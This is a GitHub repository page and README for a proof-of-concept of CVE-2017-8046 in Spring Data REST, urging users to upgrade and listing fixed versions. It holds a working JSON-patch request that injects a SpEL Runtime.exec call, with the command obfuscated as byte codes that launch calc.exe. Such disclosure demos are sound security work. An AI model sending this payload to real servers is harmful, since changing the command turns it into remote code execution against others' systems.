https://github.com/soontao/cve-2017-8046-demo
SPRING DATA REST CVE-2017-8046 DEMO
https://github.com/soontao/cve-2017-8046-demo
cve
Last synced: about 2 months ago
JSON representation
SPRING DATA REST CVE-2017-8046 DEMO
- Host: GitHub
- URL: https://github.com/soontao/cve-2017-8046-demo
- Owner: Soontao
- Created: 2017-10-01T04:52:24.000Z (over 7 years ago)
- Default Branch: master
- Last Pushed: 2023-12-15T02:30:30.000Z (over 1 year ago)
- Last Synced: 2025-01-23T12:25:17.050Z (3 months ago)
- Topics: cve
- Language: Shell
- Homepage:
- Size: 48.8 KB
- Stars: 2
- Watchers: 4
- Forks: 1
- Open Issues: 3
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# spring data rest CVE-2017-8046 demo test
please UPGRADE spring data rest NOW.
## steps
* 启动本应用
* 创建test instance
```http
POST /entityPersons/ HTTP/1.1
Host: localhost:8080
Content-Type: application/json
Cache-Control: no-cache
{
"firstName":"f2"
}
```
* 利用spel注入, 会启动C:\Windows\system32\calc.exe
```http
PATCH /entityPersons/1 HTTP/1.1
Host: localhost:8080
Content-Type: application/json-patch+json
Cache-Control: no-cache
[
{
"op":"test",
"path":"T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[] {67, 58, 92, 87, 105, 110, 100, 111, 119, 115, 92, 115, 121, 115, 116, 101, 109, 51, 50, 92, 99, 97, 108, 99, 46, 101, 120, 101} ))",
"value":""
}
]
```
## upgrade to
* Spring Data REST 2.5.12, 2.6.7, 3.0 RC3
* Spring Boot 2.0.0.M4
* Spring Data release train Kay-RC3
spring boot 1.5.7.RELEASE uses `spring data rest 2.6.7`, but 1.4.x is not upgrade spring data rest version.